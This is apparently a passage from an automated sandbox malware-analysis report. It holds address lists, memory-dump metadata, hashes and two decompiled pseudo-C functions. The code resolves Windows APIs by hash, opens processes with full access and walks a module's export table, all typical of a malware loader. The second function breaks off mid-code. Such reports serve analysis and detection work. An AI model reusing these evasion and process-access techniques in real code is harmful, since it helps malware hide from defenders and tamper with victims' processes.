0x7333990e
0x73339912
0x73339912
0x00000000
0x73339912
0x733398eb
0x733398ef
0x733398f5
0x733398f5
0x733398fb
0x00000000
0x733398fb
0x733398dd
0x733398e1
0x00000000
0x733398e1
0x7333987b
0x733398a7
0x733398bf
0x733398c3
0x733398c6
0x733398c9
0x733398cb
0x733398ce
0x733398a9
0x733398a9
0x733398ad
0x733398b0
0x733398b3
0x733398b6
0x733398b9
0x733398b9
0x00000000
0x733398a7
0x73339881
0x00000000
0x00000000
0x73339887
0x7333988b
0x73339891
0x73339894
0x73339897
0x7333989a
0x00000000
0x7333989a
0x73339712
0x73339716
0x7333971c
0x00000000
0x7333971c
0x73339654
0x73339666
0x7333966b
0x733396d6
0x00000000
0x00000000
0x733396dd
0x73339703
0x73339707
0x00000000
0x00000000
0x733396e6
0x733396eb
0x733396ff
0x00000000
0x00000000
0x00000000
0x73339701
0x733396f2
0x00000000
0x00000000
0x733396f7
0x00000000
0x00000000
0x733396f9
0x00000000
0x733396dd
0x7333966d
0x73339677
0x73339688
0x7333968b
0x7333968e
0x73339694
0x00000000
0x00000000
0x00000000
0x00000000
0x7333969a
0x7333969a
0x7333969a
0x733396a1
0x00000000
0x00000000
0x733396a3
0x733396a6
0x733396ac
0x00000000
0x00000000
0x00000000
0x733396ae
0x733396b0
0x733396b9
0x00000000
0x00000000
0x733396cd
0x00000000
0x00000000
0x00000000
0x733396cf
0x7333965b
0x00000000
0x00000000
0x00000000
0x73339661
0x733395f5
0x73339624
0x73339625
0x7333962e
0x00000000
0x7333963f
0x00000000
0x7333963f
0x733395fc
0x733395ff
0x73339612
0x73339613
0x73339617
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x733395ff
0x733395f5
0x73339581
0x733395de
0x733395e2
0x733395e8
0x00000000
0x733395e8
0x73339583
0x73339587
0x73339594
0x73339598
0x733395ae
0x733395b6
0x7333959a
0x7333959c
0x733395a6
0x733395a6
0x733395bc
0x733395c5
0x733395dc
0x00000000
0x00000000
0x00000000
0x733395dc
0x733395c7
0x733395c7
0x00000000
0x733395bc

Strings

, xrefs: 73339947

Memory Dump Source

Source File: 00000002.00000002.617918728.0000000073321000.00000020.00020000.sdmp, Offset: 73320000, based on PE: true

Associated: 00000002.00000002.617906797.0000000073320000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.617950082.000000007333A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.617974649.000000007333D000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.618004135.000000007333F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 4da791d23ea9081e4bcc915a4a84c989f5d97c3cf0c4cd625fbeb535d07cbc76
Instruction ID: 0d26c58599d7d18c9770131127e343b75ba9e9b39873190cd6db54e91d6328db
Opcode Fuzzy Hash: 4da791d23ea9081e4bcc915a4a84c989f5d97c3cf0c4cd625fbeb535d07cbc76
Instruction Fuzzy Hash: 1A22AA70408389CBE725CE15C89136ABBF5FF86310F48C86EE9D64B2D5D3359989CB92

Uniqueness

Uniqueness Score: -1.00%

Function 733284E4, Relevance: 1.8, Strings: 1, Instructions: 529
COMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E733284E4(signed int __ecx, intOrPtr __edx) {
				void* __esi;
				void* __ebp;
				signed int* _t173;
				signed int _t178;
				void* _t180;
				void* _t181;
				intOrPtr* _t188;
				signed int _t202;
				intOrPtr* _t211;
				intOrPtr* _t212;
				intOrPtr* _t217;
				signed int _t218;
				void* _t219;
				void* _t220;
				void* _t237;
				void* _t238;
				signed int* _t246;
				void* _t247;
				signed int* _t258;
				intOrPtr* _t269;
				signed int* _t277;
				intOrPtr* _t279;
				void* _t283;
				void* _t285;
				void* _t287;
				signed int _t296;
				void* _t299;
				signed int* _t308;
				intOrPtr* _t310;
				signed int _t316;
				intOrPtr _t318;
				signed int* _t324;
				signed int _t325;
				signed int _t326;
				void* _t345;
				void* _t416;
				signed int _t417;
				signed int _t424;
				signed int _t432;
				intOrPtr* _t433;
				intOrPtr* _t434;
				signed int _t437;
				signed int _t441;
				signed int _t445;
				signed int _t446;
				signed int _t447;
				signed int _t450;
				void* _t451;
				signed int _t452;
				void* _t453;
				signed int _t454;
				void* _t457;
				intOrPtr* _t458;

				_push(_t435);
				_t458 = _t457 - 0xa4;
				 *_t458 = __ecx + 0x1c;
				 *((intOrPtr*)(_t458 + 0x68)) = __edx;
				 *(_t458 + 4) = __ecx;
				 *(_t458 + 0x84) = 0;
				 *((intOrPtr*)(_t458 + 0x78)) = __ecx + 4;
				while(1) {
					_t415 =  *(_t458 + 0x6c);
					E7332B714(_t458 + 0x24,  *(_t458 + 0x6c), 0x7fffffff);
					if(E7332F56C(_t458 + 0x24) == 0) {
						goto L3;
					} else {
						 *( *(_t458 + 4) + 0x2c) = 0;
						E7332F6F0(_t458 + 0x24);
					}
					L60:
					_t318 = 0xffffffffffffffff;
					L62:
					if(_t318 != 0) {
						L65:
						return _t318;
					} else {
						if( *(_t458 + 0x84) != 0x20) {
							E7333218C(0x5dc, _t415, _t435);
							 *(_t458 + 0x84) =  *(_t458 + 0x84) + 1;
							continue;
						} else {
							_t318 = 0xffffffffffffffff;
							goto L65;
						}
					}
					L71:
					L3:
					__eflags =  *( *(_t458 + 4));
					if( *( *(_t458 + 4)) > 0) {
						_t326 = 0;
						__eflags = 0;
						do {
							 *(_t458 + 0x64) = _t326 * 4;
							_t434 = E7332F558( *(_t458 + 0x7c), _t326 * 4);
							_t435 =  *(_t458 + 0x20);
							__eflags = _t435;
							if(_t435 <= 0) {
								L11:
								_t435 =  *(_t458 + 4) + 4;
								_t283 = E7332F568( *(_t458 + 4) + 4);
								__eflags = _t283 -  *(_t458 + 0x64);
								if(_t283 >  *(_t458 + 0x64)) {
									_t451 = 4 + _t326 * 4;
									_t299 = E7332F568(_t435);
									__eflags = _t299 - _t451;
									if(_t299 > _t451) {
										 *((intOrPtr*)(_t458 + 0x9c)) = E7332F558(_t435,  *(_t458 + 0x64));
										 *((intOrPtr*)(_t458 + 0x98)) = E7332F558(_t435, _t451);
										E7333382C( *((intOrPtr*)(_t458 + 0xa4)),  *((intOrPtr*)(_t458 + 0x9c)), E7332F568(_t435) - _t451);
										_t458 = _t458 + 0xc;
									}
									E7332F8C4(_t435, E7332F568(_t435) + 0xfffffffc);
									_t308 =  *(_t458 + 4);
									 *_t308 =  *_t308 - 1;
									__eflags =  *_t308;
								}
								_t450 = E73332F8C(0xa5eabdf8, 0x2c2324e8);
								__eflags = _t450;
								if(_t450 != 0) {
									 *_t450( *(E7332F558( *(_t458 + 4),  *(_t458 + 0x64))));
								}
								_t285 = E7332F568( *_t458);
								__eflags = _t285 -  *(_t458 + 0x64);
								if(_t285 >  *(_t458 + 0x64)) {
									_t453 = 4 + _t326 * 4;
									_t287 = E7332F568( *_t458);
									__eflags = _t287 - _t453;
									if(_t287 > _t453) {
										_t435 = E7332F558( *(_t458 + 4),  *(_t458 + 0x64));
										 *((intOrPtr*)(_t458 + 0xa0)) = E7332F558( *(_t458 + 4), _t453);
										E7333382C(_t288,  *((intOrPtr*)(_t458 + 0xa4)), E7332F568( *_t458) - _t453);
										_t458 = _t458 + 0xc;
									}
									E7332F8C4( *(_t458 + 4), E7332F568( *_t458) + 0xfffffffc);
									_t296 =  *(_t458 + 4);
									_t33 = _t296 + 0x18;
									 *_t33 =  *(_t296 + 0x18) - 1;
									__eflags =  *_t33;
								}
								_t326 = _t326 - 1;
								__eflags = _t326;
							} else {
								_t452 = 0;
								__eflags = 0;
								while(1) {
									_t310 = E7332F558(_t458 + 0x28, _t452 * 4);
									__eflags =  *_t310 -  *_t434;
									if( *_t310 ==  *_t434) {
										break;
									}
									_t452 = _t452 + 1;
									__eflags = _t452 - _t435;
									if(_t452 < _t435) {
										continue;
									} else {
										goto L11;
									}
									goto L20;
								}
								__eflags = _t452 - 0xffffffff;
								if(_t452 == 0xffffffff) {
									goto L11;
								} else {
								}
							}
							L20:
							_t326 = _t326 + 1;
							__eflags = _t326 -  *( *(_t458 + 4));
						} while (_t326 <  *( *(_t458 + 4)));
					}
					__eflags =  *(_t458 + 0x20);
					if( *(_t458 + 0x20) > 0) {
						_t325 = 0;
						__eflags = 0;
						do {
							 *(_t458 + 0x7c) = _t325 * 4;
							_t433 = E7332F558(_t458 + 0x28, _t325 * 4);
							_t258 =  *(_t458 + 4);
							_t435 =  *_t258;
							__eflags = _t435;
							if(_t435 <= 0) {
								L29:
								_t445 = E73332F8C(0x4bcc7cba, 0x997e6547);
								__eflags = _t445;
								if(_t445 != 0) {
									_t447 =  *_t445(0x1fffff, 0,  *((intOrPtr*)(E7332F558(_t458 + 0x28,  *(_t458 + 0x7c)))));
									__eflags = _t447;
									if(_t447 != 0) {
										E7332F8C4( *(_t458 + 4), E7332F568( *_t458) + 4);
										 *(E7332F558( *(_t458 + 4), E7332F568( *_t458) + 0xfffffffc)) = _t447;
										 *((intOrPtr*)( *((intOrPtr*)(_t458 + 0x28 - 0x20)) + 0x18)) =  *((intOrPtr*)( *((intOrPtr*)(_t458 + 0x28 - 0x20)) + 0x18)) + 1;
										_t269 = E7332F558(_t458 + 0x28,  *(_t458 + 0x7c));
										 *((intOrPtr*)(_t458 + 0x70)) =  *(_t458 + 4) + 4;
										E7332F8C4( *((intOrPtr*)(_t458 + 0x74)), E7332F568( *(_t458 + 4) + 4) + 4);
										 *((intOrPtr*)(E7332F558( *((intOrPtr*)(_t458 + 0x74)), E7332F568( *((intOrPtr*)(_t458 + 0x70))) + 0xfffffffc))) =  *_t269;
										_t277 =  *(_t458 + 4);
										 *_t277 =  *_t277 + 1;
										__eflags =  *_t277;
									}
								}
							} else {
								_t446 = 0;
								__eflags = 0;
								 *(_t458 + 0x88) =  &(_t258[1]);
								while(1) {
									_t279 = E7332F558( *((intOrPtr*)(_t458 + 0x8c)), _t446 * 4);
									__eflags =  *_t279 -  *_t433;
									if( *_t279 ==  *_t433) {
										break;
									}
									_t446 = _t446 + 1;
									__eflags = _t446 - _t435;
									if(_t446 < _t435) {
										continue;
									} else {
										goto L29;
									}
									goto L32;
								}
								__eflags = _t446 - 0xffffffff;
								if(_t446 == 0xffffffff) {
									goto L29;
								} else {
								}
							}
							L32:
							_t325 = _t325 + 1;
							__eflags = _t325 -  *(_t458 + 0x20);
						} while (_t325 <  *(_t458 + 0x20));
					}
					E7332F6F0(_t458 + 0x24);
					_t173 =  *(_t458 + 4);
					__eflags = _t173[0xb];
					if(_t173[0xb] != 0) {
						_t432 =  *_t173;
						__eflags = _t432;
						if(_t432 > 0) {
							_t435 = 0;
							__eflags = 0;
							_t324 =  &(_t173[1]);
							while(1) {
								_t441 = _t435 * 4;
								_t217 = E7332F558(_t324, _t441);
								_t218 =  *(_t458 + 4);
								__eflags =  *_t217 -  *((intOrPtr*)(_t218 + 0x30));
								if( *_t217 ==  *((intOrPtr*)(_t218 + 0x30))) {
									break;
								}
								_t435 = _t435 + 1;
								__eflags = _t435 - _t432;
								if(_t435 < _t432) {
									continue;
								}
								goto L46;
							}
							__eflags = _t435 - 0xffffffff;
							if(_t435 != 0xffffffff) {
								_t219 = E7332F568( *_t458);
								__eflags = _t219 - _t441;
								if(_t219 > _t441) {
									 *((intOrPtr*)(_t458 + 0x74)) = 4 + _t435 * 4;
									_t247 = E7332F568( *_t458);
									__eflags = _t247 -  *((intOrPtr*)(_t458 + 0x74));
									if(_t247 >  *((intOrPtr*)(_t458 + 0x74))) {
										 *((intOrPtr*)(_t458 + 0x90)) = E7332F558( *(_t458 + 4), _t441);
										 *((intOrPtr*)(_t458 + 0x8c)) = E7332F558( *(_t458 + 4),  *((intOrPtr*)(_t458 + 0x74)));
										E7333382C( *((intOrPtr*)(_t458 + 0x98)),  *((intOrPtr*)(_t458 + 0x90)), E7332F568( *_t458) -  *((intOrPtr*)(_t458 + 0x74)));
										_t458 = _t458 + 0xc;
									}
									E7332F8C4( *(_t458 + 4), E7332F568( *_t458) + 0xfffffffc);
									_t424 =  *(_t458 + 4);
									_t75 = _t424 + 0x18;
									 *_t75 =  *(_t424 + 0x18) - 1;
									__eflags =  *_t75;
								}
								_t220 = E7332F568(_t324);
								__eflags = _t220 - _t441;
								if(_t220 > _t441) {
									_t435 = 4 + _t435 * 4;
									_t237 = E7332F568(_t324);
									__eflags = _t237 - _t435;
									if(_t237 > _t435) {
										_t238 = E7332F558(_t324, _t441);
										 *((intOrPtr*)(_t458 + 0x94)) = E7332F558(_t324, _t435);
										E7333382C(_t238,  *((intOrPtr*)(_t458 + 0x98)), E7332F568(_t324) - _t435);
										_t458 = _t458 + 0xc;
									}
									E7332F8C4(_t324, E7332F568(_t324) + 0xfffffffc);
									_t246 =  *(_t458 + 4);
									 *_t246 =  *_t246 - 1;
									__eflags =  *_t246;
								}
								E7332F8C4( *(_t458 + 4), E7332F568( *_t458) + 4);
								 *(E7332F558( *(_t458 + 4), E7332F568( *_t458) + 0xfffffffc)) =  *( *(_t458 + 4) + 0x2c);
								 *((intOrPtr*)( *(_t458 + 4) + 0x18)) =  *((intOrPtr*)( *(_t458 + 4) + 0x18)) + 1;
								E7332F8C4(_t324, E7332F568(_t324) + 4);
								 *((intOrPtr*)(E7332F558(_t324, E7332F568(_t324) + 0xfffffffc))) =  *((intOrPtr*)( *(_t458 + 4) + 0x30));
								 *( *(_t458 + 4)) =  *( *(_t458 + 4)) + 1;
							}
						}
					}
					L46:
					 *((intOrPtr*)(_t458 + 8)) = 0;
					 *((intOrPtr*)(_t458 + 0xc)) = 0;
					E7332F620(_t458 + 0x14, 0);
					 *((intOrPtr*)(_t458 + 0x34)) =  *((intOrPtr*)(_t458 + 0x68));
					 *((intOrPtr*)(_t458 + 0x38)) = 0;
					E7332F620(_t458 + 0x40, 0);
					_t178 =  *(_t458 + 4);
					_t416 = 0x40;
					__eflags =  *((intOrPtr*)(_t178 + 0x18)) - 0x40;
					_t417 =  <  ?  *((void*)(_t178 + 0x18)) : _t416;
					 *(_t458 + 0x80) = _t417;
					__eflags = _t417;
					if(_t417 <= 0) {
						L57:
						_t415 = E7332F558(_t458 + 0x14, 0);
						_t180 = E73332878( *((intOrPtr*)(_t458 + 0xc)), _t179, 0x3e8);
						_t132 = _t180 - 0x80; // -128
						_t181 = _t132;
						__eflags = _t181 - 0x3f;
						_t316 =  <=  ? _t181 : _t180;
						__eflags = _t316 - 0x102;
						if(_t316 == 0x102) {
							goto L59;
						} else {
							__eflags = _t316 - 0x3f;
							if(_t316 <= 0x3f) {
								__eflags = _t316 << 2;
								 *((intOrPtr*)( *((intOrPtr*)(_t458 + 8)) + 0x2c)) =  *((intOrPtr*)(E7332F558( *(_t458 + 4), _t316 << 2)));
								_t188 = E7332F558( *(_t458 + 0x7c), _t316 << 2);
								_t415 =  *(_t458 + 4);
								 *((intOrPtr*)(_t415 + 0x30)) =  *_t188;
								_t318 =  *((intOrPtr*)(_t415 + 0x2c));
								E7332B680(_t458 + 0x34);
								E7332B680(_t458 + 8);
							} else {
								goto L59;
							}
						}
						goto L62;
					} else {
						_t454 = 0;
						__eflags = 0;
						while(1) {
							E7332CB48(_t458 + 0x4c);
							_t415 = 0;
							_t345 = _t458 + 0x4c;
							 *((char*)(_t345 + 4)) = 0;
							 *((intOrPtr*)(_t345 + 0x20)) = 0;
							__eflags = E7332C33C(_t345);
							if(__eflags != 0) {
								break;
							}
							E7332F8C4(_t458 + 0x14, E7332F568(_t458 + 0x10) + 4);
							 *((intOrPtr*)(E7332F558(_t458 + 0x14, E7332F568(_t458 + 0x10) + 0xfffffffc))) =  *((intOrPtr*)(_t458 + 0x4c));
							 *((intOrPtr*)(_t458 + 0xc)) =  *((intOrPtr*)(_t458 + 0xc)) + 1;
							_t202 = E73332F8C(0xa5eabdf8, 0xf3119fba);
							__eflags = _t202;
							if(_t202 == 0) {
								_t415 =  *(_t458 + 0x6c);
								__eflags = _t415;
								if(__eflags == 0) {
									break;
								} else {
									__eflags = _t415 - 0xffffffff;
									if(__eflags != 0) {
										E7332F8C4(_t458 + 0x40, E7332F568(_t458 + 0x3c) + 4);
										 *(E7332F558(_t458 + 0x40, E7332F568(_t458 + 0x3c) + 0xfffffffc)) =  *(_t458 + 0x6c);
										 *((intOrPtr*)(_t458 + 0x4c - 0x14)) =  *((intOrPtr*)(_t458 + 0x4c - 0x14)) + 1;
										E7332CDE0(_t458 + 0x4c, __eflags);
										_t454 = _t454 + 1;
										__eflags = _t454 -  *(_t458 + 0x80);
										if(_t454 <  *(_t458 + 0x80)) {
											continue;
										} else {
											_t437 = 0;
											__eflags = 0;
											do {
												_t211 = E7332F558( *(_t458 + 4), _t437 * 4);
												_t212 = E7332F558(_t458 + 0x40, _t437 * 4);
												E73328C14( *_t211, E7333034C(0xa5eabdf8, 0x4145240a),  *_t212, 0, 0);
												_t437 = _t437 + 1;
												__eflags = _t437 -  *(_t458 + 0x80);
											} while (_t437 <  *(_t458 + 0x80));
											goto L57;
										}
									} else {
										break;
									}
								}
							} else {
								__eflags = 0;
								_push(2);
								_push(0);
								_push(0);
								_push(_t458 + 0x6c);
								_push( *((intOrPtr*)(_t458 + 0x78)));
								_push( *((intOrPtr*)(_t458 + 0x60)));
								_push(0xffffffff);
								asm("int3");
								return _t202;
							}
							goto L71;
						}
						E7332CDE0(_t458 + 0x4c, __eflags);
						L59:
						E7332B680(_t458 + 0x34);
						E7332B680(_t458 + 8);
						goto L60;
					}
					goto L71;
				}
			}

0x733284e4
0x733284e8
0x733284f1
0x733284f7
0x733284fb
0x733284ff
0x7332850a
0x7332850e
0x73328513
0x7332851b
0x7332852b
0x00000000
0x7332852d
0x73328535
0x7332853c
0x7332853c
0x73328a8f
0x73328a91
0x73328ad2
0x73328ad4
0x73328ae3
0x73328aef
0x73328ad6
0x73328ade
0x73328af5
0x73328afa
0x00000000
0x73328ae0
0x73328ae2
0x00000000
0x73328ae2
0x73328ade
0x00000000
0x73328546
0x7332854a
0x7332854d
0x73328553
0x73328553
0x73328555
0x7332855c
0x7332856a
0x7332856c
0x73328570
0x73328572
0x7332859e
0x733285a2
0x733285a7
0x733285ac
0x733285b0
0x733285b4
0x733285bb
0x733285c0
0x733285c2
0x73328b51
0x73328b60
0x73328b7f
0x73328b84
0x73328b84
0x733285d5
0x733285da
0x733285de
0x733285de
0x733285de
0x733285ef
0x733285f1
0x733285f3
0x73328604
0x73328604
0x73328609
0x7332860e
0x73328612
0x73328617
0x7332861e
0x73328623
0x73328625
0x73328b13
0x73328b1f
0x73328b39
0x73328b3e
0x73328b3e
0x7332863b
0x73328640
0x73328644
0x73328644
0x73328644
0x73328644
0x73328647
0x73328647
0x73328574
0x73328576
0x73328576
0x73328578
0x73328584
0x7332858b
0x7332858d
0x00000000
0x00000000
0x73328599
0x7332859a
0x7332859c
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x7332859c
0x7332858f
0x73328592
0x00000000
0x00000000
0x73328594
0x73328592
0x73328648
0x7332864c
0x7332864d
0x7332864d
0x73328555
0x73328655
0x7332865a
0x73328660
0x73328660
0x73328662
0x73328669
0x73328677
0x73328679
0x7332867d
0x7332867f
0x73328681
0x733286bc
0x733286cb
0x733286cd
0x733286cf
0x733286ed
0x733286ef
0x733286f1
0x73328703
0x73328721
0x7332872a
0x7332872d
0x7332873b
0x7332874c
0x7332876a
0x7332876c
0x73328770
0x73328770
0x73328770
0x733286f1
0x73328683
0x73328687
0x73328687
0x7332868c
0x73328693
0x733286a2
0x733286a9
0x733286ab
0x00000000
0x00000000
0x733286b7
0x733286b8
0x733286ba
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x733286ba
0x733286ad
0x733286b0
0x00000000
0x00000000
0x733286b2
0x733286b0
0x73328772
0x73328772
0x73328773
0x73328773
0x73328662
0x73328781
0x73328786
0x7332878a
0x7332878e
0x73328794
0x73328796
0x73328798
0x733287a2
0x733287a2
0x733287a4
0x733287a7
0x733287a9
0x733287b1
0x733287b8
0x733287bc
0x733287bf
0x00000000
0x00000000
0x733288bb
0x733288bc
0x733288be
0x00000000
0x00000000
0x00000000
0x733288be
0x733287c5
0x733287c8
0x733287d1
0x733287d6
0x733287d8
0x733287e4
0x733287e8
0x733287ed
0x733287f1
0x73328bce
0x73328be2
0x73328c04
0x73328c09
0x73328c09
0x73328807
0x7332880c
0x73328810
0x73328810
0x73328810
0x73328810
0x73328815
0x7332881a
0x7332881c
0x73328820
0x73328827
0x7332882c
0x7332882e
0x73328b8f
0x73328b9e
0x73328bb7
0x73328bbc
0x73328bbc
0x73328841
0x73328846
0x7332884a
0x7332884a
0x7332884a
0x7332885c
0x7332887d
0x73328885
0x73328893
0x733288b1
0x733288b7
0x733288b7
0x733287c8
0x73328798
0x733288c4
0x733288c6
0x733288ca
0x733288d3
0x733288de
0x733288e2
0x733288eb
0x733288f0
0x733288f6
0x733288f7
0x733288fb
0x733288ff
0x73328906
0x73328908
0x73328a48
0x73328a59
0x73328a60
0x73328a67
0x73328a67
0x73328a6a
0x73328a6d
0x73328a70
0x73328a76
0x00000000
0x73328a78
0x73328a78
0x73328a7b
0x73328a94
0x73328aac
0x73328aaf
0x73328ab4
0x73328abe
0x73328ac1
0x73328ac4
0x73328acd
0x00000000
0x00000000
0x00000000
0x73328a7b
0x00000000
0x7332890e
0x73328910
0x73328910
0x73328912
0x73328916
0x7332891b
0x7332891d
0x73328921
0x73328924
0x7332892c
0x7332892e
0x00000000
0x00000000
0x73328945
0x73328960
0x73328962
0x73328970
0x73328975
0x73328977
0x73328994
0x73328998
0x7332899a
0x00000000
0x7332899c
0x7332899c
0x7332899f
0x733289c0
0x733289df
0x733289e5
0x733289e8
0x733289ed
0x733289ee
0x733289f5
0x00000000
0x733289fb
0x733289fd
0x733289fd
0x733289ff
0x73328a0b
0x73328a17
0x73328a39
0x73328a3e
0x73328a3f
0x73328a3f
0x00000000
0x733289ff
0x00000000
0x00000000
0x00000000
0x7332899f
0x73328979
0x73328979
0x7332897f
0x73328981
0x73328982
0x73328983
0x73328984
0x73328988
0x7332898c
0x7332898e
0x7332898f
0x7332898f
0x00000000
0x73328977
0x733289a5
0x73328a7d
0x73328a81
0x73328a8a
0x00000000
0x73328a8a
0x00000000
0x73328908

Strings

, xrefs: 73328AD6

Memory Dump Source

Source File: 00000002.00000002.617918728.0000000073321000.00000020.00020000.sdmp, Offset: 73320000, based on PE: true

Associated: 00000002.00000002.617906797.0000000073320000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.617950082.000000007333A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.617974649.000000007333D000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.618004135.000000007333F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 7789571b791fbddc5c12bb3bfe1020c8ae27195bcf9eda4ceeed74e3e4e8d1e4
Instruction ID: 510d57ddb29ca46938e4742bfd2a82a0c20a709a533aa747aa15d3f774a946c0
Opcode Fuzzy Hash: 7789571b791fbddc5c12bb3bfe1020c8ae27195bcf9eda4ceeed74e3e4e8d1e4
Instruction Fuzzy Hash: CE1284719093449FE724DF24C980B6EBBF5EF95702F10492DE5AA9B2A0DB34DD06CB42

Uniqueness

Uniqueness Score: -1.00%

Function 733314D8, Relevance: .6, Instructions: 572
COMMONCrypto

Download Yara Rule

C-Code - Quality: 90%

			E733314D8(signed char __eax, signed char __edx) {
				void* __ebx;
				void* __esi;
				void* __ebp;
				signed char _t231;
				signed char _t233;
				signed char _t238;
				intOrPtr _t241;
				void* _t246;
				signed char _t257;
				signed char _t261;
				signed char _t269;
				signed char _t270;
				signed char _t277;
				signed int _t279;
				signed char _t280;
				signed char _t281;
				void* _t289;
				void* _t290;
				signed char _t315;
				void* _t319;
				signed char _t334;
				signed char _t336;
				void* _t341;
				void* _t347;
				intOrPtr _t352;
				signed char _t354;
				signed char _t363;
				void* _t369;
				intOrPtr _t371;
				signed short* _t373;
				void _t375;
				void* _t379;
				signed int _t381;
				void* _t382;
				void** _t383;
				void* _t384;
				char* _t387;
				signed char _t395;
				signed char* _t396;
				intOrPtr _t400;
				signed int _t451;
				intOrPtr* _t455;
				signed char _t456;
				signed int _t462;
				void* _t467;
				signed char _t471;
				signed char _t472;
				signed char* _t477;
				signed char _t487;
				signed int _t490;
				intOrPtr* _t496;
				intOrPtr _t497;
				signed char _t498;
				signed char _t499;
				intOrPtr _t500;
				signed char _t508;
				intOrPtr _t510;
				void* _t513;
				signed char _t519;
				intOrPtr* _t524;
				signed char _t525;
				signed char _t526;
				signed char _t527;
				signed char _t529;
				signed char* _t531;
				signed char _t532;
				void* _t533;
				void* _t534;
				signed char* _t535;

				_t535[0x54] = __edx;
				 *_t535 = __eax;
				_t231 = E733303A0(__edx, 1);
				if(_t231 != 0) {
					return _t231;
				}
				_t535[0x2c] = _t231;
				if( *0x7333d208 == 0 ||  *0x7333d2e4 != 0) {
					L44:
					if( *_t535 == 0) {
						return 0;
					}
					_t233 =  *_t535;
					_t371 =  *((intOrPtr*)(_t233 + 0x3c));
					_t510 =  *((intOrPtr*)(_t371 + _t233 + 0x78));
					_t535[0x130] =  *((intOrPtr*)(_t371 + _t233 + 0x7c)) + _t510;
					_t524 =  *((intOrPtr*)(_t510 + _t233 + 0x20)) + _t233;
					_t373 =  *((intOrPtr*)(_t510 + _t233 + 0x24)) + _t233;
					if( *((intOrPtr*)(_t510 + _t233 + 0x18)) <= 0) {
						L77:
						 *_t535 = 0;
						_t535[0x2c] = 0;
						L78:
						return  *_t535;
					}
					_t535[0x12c] = 0;
					_t535[0x174] = _t535[0x54] ^ 0x212ae3b8;
					do {
						_t467 = 0;
						_t387 =  *_t524 +  *_t535;
						_t238 =  *_t387;
						_t535[0x58] = _t238;
						if(_t238 == 0) {
							L49:
							if(E73334BE0( &(_t535[0x58]), _t467) == _t535[0x174]) {
								_t535[0x2c] = 0;
								_t241 =  *((intOrPtr*)( *((intOrPtr*)(_t510 +  *_t535 + 0x1c)) +  *_t535 + ( *_t373 & 0x0000ffff) * 4));
								__eflags = _t241 - _t510;
								if(_t241 < _t510) {
									L57:
									_t471 =  *_t535 + _t241;
									__eflags = _t471;
									 *_t535 = _t471;
									_t535[0x2c] = _t471;
									L58:
									__eflags =  *_t535;
									if( *_t535 == 0) {
										goto L78;
									}
									__eflags =  *0x7333d2ec |  *0x7333d2ed;
									if(( *0x7333d2ec |  *0x7333d2ed) == 0) {
										_t525 =  *0x7333d208; // 0x45c1340
										__eflags = _t525;
										if(_t525 == 0) {
											 *0x7333d2ec = 1;
											_t526 = E73333558(0x1c4);
											__eflags = _t526;
											if(_t526 == 0) {
												_t526 = 0;
												__eflags = 0;
											} else {
												E73331CCC(_t526, 0x10);
												 *(_t526 + 0x1c0) = 0;
											}
											 *0x7333d208 = _t526;
											 *0x7333d2ec = 0;
											L68:
											_t246 = 0;
											_t472 = 0;
											__eflags = 0;
											while(1) {
												__eflags =  *(_t472 + _t526 + 8);
												if( *(_t472 + _t526 + 8) == 0) {
													break;
												}
												_t246 = _t246 + 1;
												_t472 = _t472 + 0x1c;
												__eflags = _t246 - 0x10;
												if(_t246 < 0x10) {
													continue;
												}
												_t375 = E73333558(0x1c4);
												__eflags = _t375;
												if(_t375 == 0) {
													_t375 = 0;
													__eflags = 0;
												} else {
													E73331CCC(_t375, 0x10);
													 *(_t375 + 0x1c0) = 0;
												}
												 *(_t375 + 0x14) = _t535[0x2c];
												E7332E070(_t375,  &(_t535[0x58]));
												 *(_t375 + 8) = _t535[0x54];
												 *(_t526 + 0x1c0) = _t375;
												L76:
												 *_t535 = _t535[0x2c];
												goto L78;
											}
											_t527 = _t526 + _t472;
											__eflags = _t527;
											 *((intOrPtr*)(_t527 + 0x14)) =  *((intOrPtr*)( &(_t535[0x58]) - 0x2c));
											E7332E070(_t527,  &(_t535[0x58]));
											 *(_t527 + 8) = _t535[0x54];
											goto L76;
										}
										_t257 =  *(_t525 + 0x1c0);
										while(1) {
											__eflags = _t257;
											if(_t257 == 0) {
												goto L68;
											}
											_t526 = _t257;
											_t257 =  *(_t257 + 0x1c0);
										}
										goto L68;
									}
									__eflags = _t535[0x54] - 0xd926c223;
									if(_t535[0x54] == 0xd926c223) {
										 *0x7333d20c =  *_t535;
									} else {
										__eflags = _t535[0x54] - 0x80febacc;
										if(_t535[0x54] == 0x80febacc) {
											 *0x7333d210 =  *_t535;
										}
									}
									goto L78;
								}
								__eflags = _t241 - _t535[0x130];
								if(_t241 >= _t535[0x130]) {
									goto L57;
								}
								_t535[0x130] =  &(_t535[0x58]);
								_t261 = E7332E94C( &(_t535[0x58]), 0x7fffffff);
								_t477 =  &(_t535[0x12c]);
								 *_t477 = _t261;
								_t477[2] = _t261 + 1;
								_t395 = E73332F94(0xa5eabdf8, 0x9766f056, 0xa5eabdf8, 0xa5eabdf8);
								__eflags = _t395;
								if(_t395 != 0) {
									_t202 =  &(_t535[0x12c]); // 0x100
									 *_t395(_t535[0xc], _t202, 0,  &(_t535[0x2c]));
								}
								 *_t535 = _t535[0x2c];
								goto L58;
							}
							goto L50;
						} else {
							goto L48;
						}
						do {
							L48:
							_t467 = _t467 + 1;
							_t270 =  *((intOrPtr*)(_t467 + _t387));
							_t535[_t467 + 0x58] = _t270;
						} while (_t270 != 0);
						goto L49;
						L50:
						_t524 = _t524 + 4;
						_t396 =  &(_t535[0x12c]);
						_t373 =  &(_t373[1]);
						_t269 =  *_t396 + 1;
						 *_t396 = _t269;
					} while (_t269 <  *((intOrPtr*)(_t510 +  *_t535 + 0x18)));
					goto L77;
				} else {
					_t535[0x30] = 0;
					 *0x7333d2e4 = 1;
